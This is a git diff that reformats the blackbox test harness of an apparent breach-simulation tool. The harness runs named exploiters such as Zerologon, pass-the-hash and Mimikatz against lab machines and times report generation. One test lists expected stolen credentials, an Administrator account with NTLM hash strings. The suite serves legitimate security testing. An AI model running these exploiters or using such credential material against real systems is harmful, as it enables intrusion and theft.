envs.monkey_zoo.blackbox.config_templates.weblogic import Weblogic from envs.monkey_zoo.blackbox.config_templates.wmi_mimikatz import WmiMimikatz from envs.monkey_zoo.blackbox.config_templates.wmi_pth import WmiPth from envs.monkey_zoo.blackbox.config_templates.zerologon import Zerologon -from envs.monkey_zoo.blackbox.log_handlers.test_logs_handler import \ - TestLogsHandler +from envs.monkey_zoo.blackbox.log_handlers.test_logs_handler import TestLogsHandler from envs.monkey_zoo.blackbox.tests.exploitation import ExploitationTest -from envs.monkey_zoo.blackbox.tests.performance.map_generation import \ - MapGenerationTest -from envs.monkey_zoo.blackbox.tests.performance.map_generation_from_telemetries import \ - MapGenerationFromTelemetryTest -from envs.monkey_zoo.blackbox.tests.performance.report_generation import \ - ReportGenerationTest -from envs.monkey_zoo.blackbox.tests.performance.report_generation_from_telemetries import \ - ReportGenerationFromTelemetryTest -from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test import \ - TelemetryPerformanceTest +from envs.monkey_zoo.blackbox.tests.performance.map_generation import MapGenerationTest +from envs.monkey_zoo.blackbox.tests.performance.map_generation_from_telemetries import ( + MapGenerationFromTelemetryTest, +) +from envs.monkey_zoo.blackbox.tests.performance.report_generation import ReportGenerationTest +from envs.monkey_zoo.blackbox.tests.performance.report_generation_from_telemetries import ( + ReportGenerationFromTelemetryTest, +) +from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test import ( + TelemetryPerformanceTest, +) from envs.monkey_zoo.blackbox.utils import gcp_machine_handlers -DEFAULT_TIMEOUT_SECONDS = 5*60 +DEFAULT_TIMEOUT_SECONDS = 5 * 60 MACHINE_BOOTUP_WAIT_SECONDS = 30 -GCP_TEST_MACHINE_LIST = ['sshkeys-11', 'sshkeys-12', 'elastic-4', 'elastic-5', 'hadoop-2', 'hadoop-3', 'mssql-16', - 'mimikatz-14', 'mimikatz-15', 'struts2-23', 'struts2-24', 'tunneling-9', 'tunneling-10', - 'tunneling-11', 'tunneling-12', 'weblogic-18', 'weblogic-19', 'shellshock-8', 'zerologon-25', - 'drupal-28'] +GCP_TEST_MACHINE_LIST = [ + "sshkeys-11", + "sshkeys-12", + "elastic-4", + "elastic-5", + "hadoop-2", + "hadoop-3", + "mssql-16", + "mimikatz-14", + 
"mimikatz-15", + "struts2-23", + "struts2-24", + "tunneling-9", + "tunneling-10", + "tunneling-11", + "tunneling-12", + "weblogic-18", + "weblogic-19", + "shellshock-8", + "zerologon-25", + "drupal-28", +] LOG_DIR_PATH = "./logs" logging.basicConfig(level=logging.INFO) LOGGER = logging.getLogger(__name__) -@pytest.fixture(autouse=True, scope='session') +@pytest.fixture(autouse=True, scope="session") def GCPHandler(request, no_gcp): if not no_gcp: GCPHandler = gcp_machine_handlers.GCPHandler() @@ -67,7 +82,7 @@ def GCPHandler(request, no_gcp): request.addfinalizer(fin) -@pytest.fixture(autouse=True, scope='session') +@pytest.fixture(autouse=True, scope="session") def delete_logs(): LOGGER.info("Deleting monkey logs before new tests.") TestLogsHandler.delete_log_folder_contents(TestMonkeyBlackbox.get_log_dir_path()) @@ -77,7 +92,7 @@ def wait_machine_bootup(): sleep(MACHINE_BOOTUP_WAIT_SECONDS) -@pytest.fixture(scope='class') +@pytest.fixture(scope="class") def island_client(island, quick_performance_tests): island_client_object = MonkeyIslandClient(island) if not quick_performance_tests: @@ -85,41 +100,55 @@ def island_client(island, quick_performance_tests): yield island_client_object -@pytest.mark.usefixtures('island_client') +@pytest.mark.usefixtures("island_client") # noinspection PyUnresolvedReferences class TestMonkeyBlackbox: - @staticmethod - def run_exploitation_test(island_client: MonkeyIslandClient, - config_template: Type[ConfigTemplate], - test_name: str, - timeout_in_seconds=DEFAULT_TIMEOUT_SECONDS): + def run_exploitation_test( + island_client: MonkeyIslandClient, + config_template: Type[ConfigTemplate], + test_name: str, + timeout_in_seconds=DEFAULT_TIMEOUT_SECONDS, + ): raw_config = IslandConfigParser.get_raw_config(config_template, island_client) - analyzer = CommunicationAnalyzer(island_client, - IslandConfigParser.get_ips_of_targets(raw_config)) - log_handler = TestLogsHandler(test_name, island_client, TestMonkeyBlackbox.get_log_dir_path()) + analyzer = CommunicationAnalyzer( + island_client, IslandConfigParser.get_ips_of_targets(raw_config) + ) + log_handler = TestLogsHandler( + test_name, island_client, TestMonkeyBlackbox.get_log_dir_path() + ) ExploitationTest( name=test_name, island_client=island_client, raw_config=raw_config, analyzers=[analyzer], timeout=timeout_in_seconds, - log_handler=log_handler).run() + log_handler=log_handler, + ).run() @staticmethod - def run_performance_test(performance_test_class, island_client, - config_template, timeout_in_seconds, break_on_timeout=False): + def run_performance_test( + performance_test_class, + island_client, + config_template, + timeout_in_seconds, + break_on_timeout=False, + ): raw_config = IslandConfigParser.get_raw_config(config_template, island_client) - log_handler = TestLogsHandler(performance_test_class.TEST_NAME, - island_client, - TestMonkeyBlackbox.get_log_dir_path()) - analyzers = [CommunicationAnalyzer(island_client, IslandConfigParser.get_ips_of_targets(raw_config))] - performance_test_class(island_client=island_client, - raw_config=raw_config, - analyzers=analyzers, - timeout=timeout_in_seconds, - log_handler=log_handler, - break_on_timeout=break_on_timeout).run() + log_handler = TestLogsHandler( + performance_test_class.TEST_NAME, island_client, TestMonkeyBlackbox.get_log_dir_path() + ) + analyzers = [ + CommunicationAnalyzer(island_client, IslandConfigParser.get_ips_of_targets(raw_config)) + ] + performance_test_class( + island_client=island_client, + raw_config=raw_config, + analyzers=analyzers, + 
timeout=timeout_in_seconds, + log_handler=log_handler, + break_on_timeout=break_on_timeout, + ).run() @staticmethod def get_log_dir_path(): @@ -138,7 +167,9 @@ class TestMonkeyBlackbox: TestMonkeyBlackbox.run_exploitation_test(island_client, Mssql, "MSSQL_exploiter") def test_smb_and_mimikatz_exploiters(self, island_client): - TestMonkeyBlackbox.run_exploitation_test(island_client, SmbMimikatz, "SMB_exploiter_mimikatz") + TestMonkeyBlackbox.run_exploitation_test( + island_client, SmbMimikatz, "SMB_exploiter_mimikatz" + ) def test_smb_pth(self, island_client): TestMonkeyBlackbox.run_exploitation_test(island_client, SmbPth, "SMB_PTH") @@ -159,31 +190,42 @@ class TestMonkeyBlackbox: TestMonkeyBlackbox.run_exploitation_test(island_client, ShellShock, "Shellschock_exploiter") def test_tunneling(self, island_client): - TestMonkeyBlackbox.run_exploitation_test(island_client, Tunneling, "Tunneling_exploiter", 15 * 60) + TestMonkeyBlackbox.run_exploitation_test( + island_client, Tunneling, "Tunneling_exploiter", 15 * 60 + ) def test_wmi_and_mimikatz_exploiters(self, island_client): - TestMonkeyBlackbox.run_exploitation_test(island_client, WmiMimikatz, "WMI_exploiter,_mimikatz") + TestMonkeyBlackbox.run_exploitation_test( + island_client, WmiMimikatz, "WMI_exploiter,_mimikatz" + ) def test_wmi_pth(self, island_client): TestMonkeyBlackbox.run_exploitation_test(island_client, WmiPth, "WMI_PTH") def test_zerologon_exploiter(self, island_client): test_name = "Zerologon_exploiter" - expected_creds = ["Administrator", - "aad3b435b51404eeaad3b435b51404ee", - "2864b62ea4496934a5d6e86f50b834a5"] + expected_creds = [ + "Administrator", + "aad3b435b51404eeaad3b435b51404ee", + "2864b62ea4496934a5d6e86f50b834a5", + ] raw_config = IslandConfigParser.get_raw_config(Zerologon, island_client) analyzer = ZerologonAnalyzer(island_client, expected_creds) - log_handler = TestLogsHandler(test_name, island_client, TestMonkeyBlackbox.get_log_dir_path()) + log_handler = TestLogsHandler( + test_name, island_client, TestMonkeyBlackbox.get_log_dir_path() + ) ExploitationTest( name=test_name, island_client=island_client, raw_config=raw_config, analyzers=[analyzer], timeout=DEFAULT_TIMEOUT_SECONDS, - log_handler=log_handler).run() + log_handler=log_handler, + ).run() - @pytest.mark.skip(reason="Perfomance test that creates env from fake telemetries is faster, use that instead.") + @pytest.mark.skip( + reason="Perfomance test that creates env from fake telemetries is faster, use that instead." + ) def test_report_generation_performance(self, island_client, quick_performance_tests): """ This test includes the SSH + Elastic + Hadoop + MSSQL machines all in one test @@ -193,21 +235,21 @@ class TestMonkeyBlackbox: and the Timing one which checks how long the report took to execute """ if not quick_performance_tests: - TestMonkeyBlackbox.run_performance_test(ReportGenerationTest, - island_client, - Performance, - timeout_in_seconds=10*60) + TestMonkeyBlackbox.run_performance_test( + ReportGenerationTest, island_client, Performance, timeout_in_seconds=10 * 60 + ) else: LOGGER.error("This test doesn't support 'quick_performance_tests' option.") assert False - @pytest.mark.skip(reason="Perfomance test that creates env from fake telemetries is faster, use that instead.") + @pytest.mark.skip( + reason="Perfomance test that creates env from fake telemetries is faster, use that instead." 
+ ) def test_map_generation_performance(self, island_client, quick_performance_tests): if not quick_performance_tests: - TestMonkeyBlackbox.run_performance_test(MapGenerationTest, - island_client, - "PERFORMANCE.conf", - timeout_in_seconds=10*60) + TestMonkeyBlackbox.run_performance_test( + MapGenerationTest, island_client, "PERFORMANCE.conf", timeout_in_seconds=10 * 60 + ) else: LOGGER.error("This test doesn't support 'quick_performance_tests' option.") assert False @@ -219,4 +261,6 @@ class TestMonkeyBlackbox: MapGenerationFromTelemetryTest(island_client, quick_performance_tests).run() def test_telem_performance(self, island_client, quick_performance_tests): - TelemetryPerformanceTest(island_client, quick_performance_tests).test_telemetry_performance() + TelemetryPerformanceTest( + island_client, quick_performance_tests + ).test_telemetry_performance() diff --git a/envs/monkey_zoo/blackbox/tests/basic_test.py b/envs/monkey_zoo/blackbox/tests/basic_test.py index fa722ffb7..7bec9c873 100644 --- a/envs/monkey_zoo/blackbox/tests/basic_test.py +++ b/envs/monkey_zoo/blackbox/tests/basic_test.py @@ -2,7 +2,6 @@ import abc class BasicTest(abc.ABC): - @abc.abstractmethod def run(self): pass diff --git a/envs/monkey_zoo/blackbox/tests/exploitation.py b/envs/monkey_zoo/blackbox/tests/exploitation.py index d6332bc75..e3397b949 100644 --- a/envs/monkey_zoo/blackbox/tests/exploitation.py +++ b/envs/monkey_zoo/blackbox/tests/exploitation.py @@ -13,7 +13,6 @@ LOGGER = logging.getLogger(__name__) class ExploitationTest(BasicTest): - def __init__(self, name, island_client, raw_config, analyzers, timeout, log_handler): self.name = name self.island_client = island_client @@ -48,18 +47,25 @@ class ExploitationTest(BasicTest): self.log_success(timer) return sleep(DELAY_BETWEEN_ANALYSIS) - LOGGER.debug("Waiting until all analyzers passed. Time passed: {}".format(timer.get_time_taken())) + LOGGER.debug( + "Waiting until all analyzers passed. Time passed: {}".format(timer.get_time_taken()) + ) self.log_failure(timer) assert False def log_success(self, timer): LOGGER.info(self.get_analyzer_logs()) - LOGGER.info("{} test passed, time taken: {:.1f} seconds.".format(self.name, timer.get_time_taken())) + LOGGER.info( + "{} test passed, time taken: {:.1f} seconds.".format(self.name, timer.get_time_taken()) + ) def log_failure(self, timer): LOGGER.info(self.get_analyzer_logs()) - LOGGER.error("{} test failed because of timeout. Time taken: {:.1f} seconds.".format(self.name, - timer.get_time_taken())) + LOGGER.error( + "{} test failed because of timeout. Time taken: {:.1f} seconds.".format( + self.name, timer.get_time_taken() + ) + ) def all_analyzers_pass(self): analyzers_results = [analyzer.analyze_test_results() for analyzer in self.analyzers] @@ -73,7 +79,10 @@ class ExploitationTest(BasicTest): def wait_until_monkeys_die(self): time_passed = 0 - while not self.island_client.is_all_monkeys_dead() and time_passed < MAX_TIME_FOR_MONKEYS_TO_DIE: + while ( + not self.island_client.is_all_monkeys_dead() + and time_passed < MAX_TIME_FOR_MONKEYS_TO_DIE + ): sleep(WAIT_TIME_BETWEEN_REQUESTS) time_passed += WAIT_TIME_BETWEEN_REQUESTS LOGGER.debug("Waiting for all monkeys to die. 
Time passed: {}".format(time_passed)) diff --git a/envs/monkey_zoo/blackbox/tests/performance/endpoint_performance_test.py b/envs/monkey_zoo/blackbox/tests/performance/endpoint_performance_test.py index b8793452d..1e2345ecf 100644 --- a/envs/monkey_zoo/blackbox/tests/performance/endpoint_performance_test.py +++ b/envs/monkey_zoo/blackbox/tests/performance/endpoint_performance_test.py @@ -10,7 +10,6 @@ LOGGER = logging.getLogger(__name__) class EndpointPerformanceTest(BasicTest): - def __init__(self, name, test_config: PerformanceTestConfig, island_client: MonkeyIslandClient): self.name = name self.test_config = test_config @@ -21,8 +20,9 @@ class EndpointPerformanceTest(BasicTest): endpoint_timings = {} for endpoint in self.test_config.endpoints_to_test: self.island_client.clear_caches() - endpoint_timings[endpoint] = self.island_client.requests.get_request_time(endpoint, - SupportedRequestMethod.GET) + endpoint_timings[endpoint] = self.island_client.requests.get_request_time( + endpoint, SupportedRequestMethod.GET + ) analyzer = PerformanceAnalyzer(self.test_config, endpoint_timings) return analyzer.analyze_test_results() diff --git a/envs/monkey_zoo/blackbox/tests/performance/map_generation.py b/envs/monkey_zoo/blackbox/tests/performance/map_generation.py index 42d2265e7..f925f031d 100644 --- a/envs/monkey_zoo/blackbox/tests/performance/map_generation.py +++ b/envs/monkey_zoo/blackbox/tests/performance/map_generation.py @@ -3,7 +3,9 @@ from datetime import timedelta from envs.monkey_zoo.blackbox.tests.exploitation import ExploitationTest from envs.monkey_zoo.blackbox.tests.performance.performance_test import PerformanceTest from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig -from envs.monkey_zoo.blackbox.tests.performance.performance_test_workflow import PerformanceTestWorkflow +from envs.monkey_zoo.blackbox.tests.performance.performance_test_workflow import ( + PerformanceTestWorkflow, +) MAX_ALLOWED_SINGLE_PAGE_TIME = timedelta(seconds=2) MAX_ALLOWED_TOTAL_TIME = timedelta(seconds=5) @@ -17,18 +19,22 @@ class MapGenerationTest(PerformanceTest): TEST_NAME = "Map generation performance test" - def __init__(self, island_client, raw_config, analyzers, - timeout, log_handler, break_on_timeout): + def __init__( + self, island_client, raw_config, analyzers, timeout, log_handler, break_on_timeout + ): self.island_client = island_client - exploitation_test = ExploitationTest(MapGenerationTest.TEST_NAME, island_client, - raw_config, analyzers, timeout, log_handler) - performance_config = PerformanceTestConfig(max_allowed_single_page_time=MAX_ALLOWED_SINGLE_PAGE_TIME, - max_allowed_total_time=MAX_ALLOWED_TOTAL_TIME, - endpoints_to_test=MAP_RESOURCES, - break_on_timeout=break_on_timeout) - self.performance_test_workflow = PerformanceTestWorkflow(MapGenerationTest.TEST_NAME, - exploitation_test, - performance_config) + exploitation_test = ExploitationTest( + MapGenerationTest.TEST_NAME, island_client, raw_config, analyzers, timeout, log_handler + ) + performance_config = PerformanceTestConfig( + max_allowed_single_page_time=MAX_ALLOWED_SINGLE_PAGE_TIME, + max_allowed_total_time=MAX_ALLOWED_TOTAL_TIME, + endpoints_to_test=MAP_RESOURCES, + break_on_timeout=break_on_timeout, + ) + self.performance_test_workflow = PerformanceTestWorkflow( + MapGenerationTest.TEST_NAME, exploitation_test, performance_config + ) def run(self): self.performance_test_workflow.run() diff --git a/envs/monkey_zoo/blackbox/tests/performance/map_generation_from_telemetries.py 
b/envs/monkey_zoo/blackbox/tests/performance/map_generation_from_telemetries.py index 1b31a8962..8713d3c0f 100644 --- a/envs/monkey_zoo/blackbox/tests/performance/map_generation_from_telemetries.py +++ b/envs/monkey_zoo/blackbox/tests/performance/map_generation_from_telemetries.py @@ -2,8 +2,9 @@ from datetime import timedelta from envs.monkey_zoo.blackbox.tests.performance.performance_test import PerformanceTest from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig -from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test_workflow import \ - TelemetryPerformanceTestWorkflow +from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test_workflow import ( + TelemetryPerformanceTestWorkflow, +) MAX_ALLOWED_SINGLE_PAGE_TIME = timedelta(seconds=2) MAX_ALLOWED_TOTAL_TIME = timedelta(seconds=5) @@ -19,14 +20,18 @@ class MapGenerationFromTelemetryTest(PerformanceTest): def __init__(self, island_client, quick_performance_test: bool, break_on_timeout=False): self.island_client = island_client - performance_config = PerformanceTestConfig(max_allowed_single_page_time=MAX_ALLOWED_SINGLE_PAGE_TIME, - max_allowed_total_time=MAX_ALLOWED_TOTAL_TIME, - endpoints_to_test=MAP_RESOURCES, - break_on_timeout=break_on_timeout) - self.performance_test_workflow = TelemetryPerformanceTestWorkflow(MapGenerationFromTelemetryTest.TEST_NAME, - self.island_client, - performance_config, - quick_performance_test) + performance_config = PerformanceTestConfig( + max_allowed_single_page_time=MAX_ALLOWED_SINGLE_PAGE_TIME, + max_allowed_total_time=MAX_ALLOWED_TOTAL_TIME, + endpoints_to_test=MAP_RESOURCES, + break_on_timeout=break_on_timeout, + ) + self.performance_test_workflow = TelemetryPerformanceTestWorkflow( + MapGenerationFromTelemetryTest.TEST_NAME, + self.island_client, + performance_config, + quick_performance_test, + ) def run(self): self.performance_test_workflow.run() diff --git a/envs/monkey_zoo/blackbox/tests/performance/performance_test.py b/envs/monkey_zoo/blackbox/tests/performance/performance_test.py index dd6af8065..de5d49945 100644 --- a/envs/monkey_zoo/blackbox/tests/performance/performance_test.py +++ b/envs/monkey_zoo/blackbox/tests/performance/performance_test.py @@ -4,10 +4,10 @@ from envs.monkey_zoo.blackbox.tests.basic_test import BasicTest class PerformanceTest(BasicTest, metaclass=ABCMeta): - @abstractmethod - def __init__(self, island_client, raw_config, analyzers, - timeout, log_handler, break_on_timeout): + def __init__( + self, island_client, raw_config, analyzers, timeout, log_handler, break_on_timeout + ): pass @property diff --git a/envs/monkey_zoo/blackbox/tests/performance/performance_test_config.py b/envs/monkey_zoo/blackbox/tests/performance/performance_test_config.py index ad7be5967..cc45093c0 100644 --- a/envs/monkey_zoo/blackbox/tests/performance/performance_test_config.py +++ b/envs/monkey_zoo/blackbox/tests/performance/performance_test_config.py @@ -3,9 +3,13 @@ from typing import List class PerformanceTestConfig: - - def __init__(self, max_allowed_single_page_time: timedelta, max_allowed_total_time: timedelta, - endpoints_to_test: List[str] = None, break_on_timeout=False): + def __init__( + self, + max_allowed_single_page_time: timedelta, + max_allowed_total_time: timedelta, + endpoints_to_test: List[str] = None, + break_on_timeout=False, + ): self.max_allowed_single_page_time = max_allowed_single_page_time self.max_allowed_total_time = max_allowed_total_time self.endpoints_to_test = endpoints_to_test 
diff --git a/envs/monkey_zoo/blackbox/tests/performance/performance_test_workflow.py b/envs/monkey_zoo/blackbox/tests/performance/performance_test_workflow.py index 7799e3d29..de63ed899 100644 --- a/envs/monkey_zoo/blackbox/tests/performance/performance_test_workflow.py +++ b/envs/monkey_zoo/blackbox/tests/performance/performance_test_workflow.py @@ -1,12 +1,15 @@ from envs.monkey_zoo.blackbox.tests.basic_test import BasicTest from envs.monkey_zoo.blackbox.tests.exploitation import ExploitationTest -from envs.monkey_zoo.blackbox.tests.performance.endpoint_performance_test import EndpointPerformanceTest +from envs.monkey_zoo.blackbox.tests.performance.endpoint_performance_test import ( + EndpointPerformanceTest, +) from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig class PerformanceTestWorkflow(BasicTest): - - def __init__(self, name, exploitation_test: ExploitationTest, performance_config: PerformanceTestConfig): + def __init__( + self, name, exploitation_test: ExploitationTest, performance_config: PerformanceTestConfig + ): self.name = name self.exploitation_test = exploitation_test self.island_client = exploitation_test.island_client @@ -25,7 +28,9 @@ class PerformanceTestWorkflow(BasicTest): self.exploitation_test.wait_for_monkey_process_to_finish() if not self.island_client.is_all_monkeys_dead(): raise RuntimeError("Can't test report times since not all Monkeys have died.") - performance_test = EndpointPerformanceTest(self.name, self.performance_config, self.island_client) + performance_test = EndpointPerformanceTest( + self.name, self.performance_config, self.island_client + ) try: if not self.island_client.is_all_monkeys_dead(): raise RuntimeError("Can't test report times since not all Monkeys have died.") diff --git a/envs/monkey_zoo/blackbox/tests/performance/report_generation.py b/envs/monkey_zoo/blackbox/tests/performance/report_generation.py index f05661682..c7efc6057 100644 --- a/envs/monkey_zoo/blackbox/tests/performance/report_generation.py +++ b/envs/monkey_zoo/blackbox/tests/performance/report_generation.py @@ -3,7 +3,9 @@ from datetime import timedelta from envs.monkey_zoo.blackbox.tests.exploitation import ExploitationTest from envs.monkey_zoo.blackbox.tests.performance.performance_test import PerformanceTest from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig -from envs.monkey_zoo.blackbox.tests.performance.performance_test_workflow import PerformanceTestWorkflow +from envs.monkey_zoo.blackbox.tests.performance.performance_test_workflow import ( + PerformanceTestWorkflow, +) MAX_ALLOWED_SINGLE_PAGE_TIME = timedelta(seconds=2) MAX_ALLOWED_TOTAL_TIME = timedelta(seconds=5) @@ -13,25 +15,34 @@ REPORT_RESOURCES = [ "api/attack/report", "api/report/zero_trust/findings", "api/report/zero_trust/principles", - "api/report/zero_trust/pillars" + "api/report/zero_trust/pillars", ] class ReportGenerationTest(PerformanceTest): TEST_NAME = "Report generation performance test" - def __init__(self, island_client, raw_config, analyzers, - timeout, log_handler, break_on_timeout): + def __init__( + self, island_client, raw_config, analyzers, timeout, log_handler, break_on_timeout + ): self.island_client = island_client - exploitation_test = ExploitationTest(ReportGenerationTest.TEST_NAME, island_client, - raw_config, analyzers, timeout, log_handler) - performance_config = PerformanceTestConfig(max_allowed_single_page_time=MAX_ALLOWED_SINGLE_PAGE_TIME, - 
max_allowed_total_time=MAX_ALLOWED_TOTAL_TIME, - endpoints_to_test=REPORT_RESOURCES, - break_on_timeout=break_on_timeout) - self.performance_test_workflow = PerformanceTestWorkflow(ReportGenerationTest.TEST_NAME, - exploitation_test, - performance_config) + exploitation_test = ExploitationTest( + ReportGenerationTest.TEST_NAME, + island_client, + raw_config, + analyzers, + timeout, + log_handler, + ) + performance_config = PerformanceTestConfig( + max_allowed_single_page_time=MAX_ALLOWED_SINGLE_PAGE_TIME, + max_allowed_total_time=MAX_ALLOWED_TOTAL_TIME, + endpoints_to_test=REPORT_RESOURCES, + break_on_timeout=break_on_timeout, + ) + self.performance_test_workflow = PerformanceTestWorkflow( + ReportGenerationTest.TEST_NAME, exploitation_test, performance_config + ) def run(self): self.performance_test_workflow.run() diff --git a/envs/monkey_zoo/blackbox/tests/performance/report_generation_from_telemetries.py b/envs/monkey_zoo/blackbox/tests/performance/report_generation_from_telemetries.py index abc2b35c2..59c7e1848 100644 --- a/envs/monkey_zoo/blackbox/tests/performance/report_generation_from_telemetries.py +++ b/envs/monkey_zoo/blackbox/tests/performance/report_generation_from_telemetries.py @@ -2,8 +2,9 @@ from datetime import timedelta from envs.monkey_zoo.blackbox.tests.performance.performance_test import PerformanceTest from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig -from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test_workflow import \ - TelemetryPerformanceTestWorkflow +from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test_workflow import ( + TelemetryPerformanceTestWorkflow, +) MAX_ALLOWED_SINGLE_PAGE_TIME = timedelta(seconds=2) MAX_ALLOWED_TOTAL_TIME = timedelta(seconds=5) @@ -13,7 +14,7 @@ REPORT_RESOURCES = [ "api/attack/report", "api/report/zero_trust/findings", "api/report/zero_trust/principles", - "api/report/zero_trust/pillars" + "api/report/zero_trust/pillars", ] @@ -23,14 +24,18 @@ class ReportGenerationFromTelemetryTest(PerformanceTest): def __init__(self, island_client, quick_performance_test, break_on_timeout=False): self.island_client = island_client - performance_config = PerformanceTestConfig(max_allowed_single_page_time=MAX_ALLOWED_SINGLE_PAGE_TIME, - max_allowed_total_time=MAX_ALLOWED_TOTAL_TIME, - endpoints_to_test=REPORT_RESOURCES, - break_on_timeout=break_on_timeout) - self.performance_test_workflow = TelemetryPerformanceTestWorkflow(ReportGenerationFromTelemetryTest.TEST_NAME, - self.island_client, - performance_config, - quick_performance_test) + performance_config = PerformanceTestConfig( + max_allowed_single_page_time=MAX_ALLOWED_SINGLE_PAGE_TIME, + max_allowed_total_time=MAX_ALLOWED_TOTAL_TIME, + endpoints_to_test=REPORT_RESOURCES, + break_on_timeout=break_on_timeout, + ) + self.performance_test_workflow = TelemetryPerformanceTestWorkflow( + ReportGenerationFromTelemetryTest.TEST_NAME, + self.island_client, + performance_config, + quick_performance_test, + ) def run(self): self.performance_test_workflow.run() diff --git a/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_file_parser.py b/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_file_parser.py index 0f0c3311f..42a851405 100644 --- a/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_file_parser.py +++ b/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_file_parser.py @@ -5,39 +5,43 @@ from typing import Dict, List from 
tqdm import tqdm -TELEM_DIR_PATH = './tests/performance/telem_sample' +TELEM_DIR_PATH = "./tests/performance/telem_sample" MAX_SAME_TYPE_TELEM_FILES = 10000 LOGGER = logging.getLogger(__name__) class SampleFileParser: - @staticmethod def save_teletries_to_files(telems: List[Dict]): - for telem in (tqdm(telems, desc="Telemetries saved to files", position=3)): + for telem in tqdm(telems, desc="Telemetries saved to files", position=3): SampleFileParser.save_telemetry_to_file(telem) @staticmethod def save_telemetry_to_file(telem: Dict): - telem_filename = telem['name'] + telem['method'] + telem_filename = telem["name"] + telem["method"] for i in range(MAX_SAME_TYPE_TELEM_FILES): if not path.exists(path.join(TELEM_DIR_PATH, (str(i) + telem_filename))): telem_filename = str(i) + telem_filename break - with open(path.join(TELEM_DIR_PATH, telem_filename), 'w') as file: + with open(path.join(TELEM_DIR_PATH, telem_filename), "w") as file: file.write(json.dumps(telem)) @staticmethod def read_telem_files() -> List[str]: telems = [] try: - file_paths = [path.join(TELEM_DIR_PATH, f) for f in listdir(TELEM_DIR_PATH) - if path.isfile(path.join(TELEM_DIR_PATH, f))] + file_paths = [ + path.join(TELEM_DIR_PATH, f) + for f in listdir(TELEM_DIR_PATH) + if path.isfile(path.join(TELEM_DIR_PATH, f)) + ] except FileNotFoundError: - raise FileNotFoundError("Telemetries to send not found. " - "Refer to readme to figure out how to generate telemetries and where to put them.") + raise FileNotFoundError( + "Telemetries to send not found. " + "Refer to readme to figure out how to generate telemetries and where to put them." + ) for file_path in file_paths: - with open(file_path, 'r') as telem_file: + with open(file_path, "r") as telem_file: telem_string = "".join(telem_file.readlines()).replace("\n", "") telems.append(telem_string) return telems diff --git a/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/fake_ip_generator.py b/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/fake_ip_generator.py index 90422f9a0..70bb69de4 100644 --- a/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/fake_ip_generator.py +++ b/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/fake_ip_generator.py @@ -8,7 +8,7 @@ class FakeIpGenerator: def generate_fake_ips_for_real_ips(self, real_ips: List[str]) -> List[str]: fake_ips = [] for i in range(len(real_ips)): - fake_ips.append('.'.join(str(part) for part in self.fake_ip_parts)) + fake_ips.append(".".join(str(part) for part in self.fake_ip_parts)) self.increment_ip() return fake_ips @@ -19,7 +19,7 @@ class FakeIpGenerator: def try_fix_ip_range(self): for i in range(len(self.fake_ip_parts)): if self.fake_ip_parts[i] > 256: - if i-1 < 0: + if i - 1 < 0: raise Exception("Fake IP's out of range.") - self.fake_ip_parts[i-1] += 1 + self.fake_ip_parts[i - 1] += 1 self.fake_ip_parts[i] = 1 diff --git a/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/fake_monkey.py b/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/fake_monkey.py index efee81227..2a39e6353 100644 --- a/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/fake_monkey.py +++ b/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/fake_monkey.py @@ -1,7 +1,8 @@ import random -from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_ip_generator import \ 
- FakeIpGenerator +from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_ip_generator import ( + FakeIpGenerator, +) class FakeMonkey: diff --git a/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/sample_multiplier.py b/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/sample_multiplier.py index cb5956025..7a1fb4032 100644 --- a/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/sample_multiplier.py +++ b/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/sample_multiplier.py @@ -6,24 +6,28 @@ from typing import Dict, List from tqdm import tqdm -from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_file_parser import SampleFileParser -from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_ip_generator import \ - FakeIpGenerator -from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_monkey import FakeMonkey +from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_file_parser import ( + SampleFileParser, +) +from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_ip_generator import ( + FakeIpGenerator, +) +from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_monkey import ( + FakeMonkey, +) -TELEM_DIR_PATH = './tests/performance/telemetry_sample' +TELEM_DIR_PATH = "./tests/performance/telemetry_sample" LOGGER = logging.getLogger(__name__) class SampleMultiplier: - def __init__(self, multiplier: int): self.multiplier = multiplier self.fake_ip_generator = FakeIpGenerator() def multiply_telems(self): telems = SampleFileParser.get_all_telemetries() - telem_contents = [json.loads(telem['content']) for telem in telems] + telem_contents = [json.loads(telem["content"]) for telem in telems] 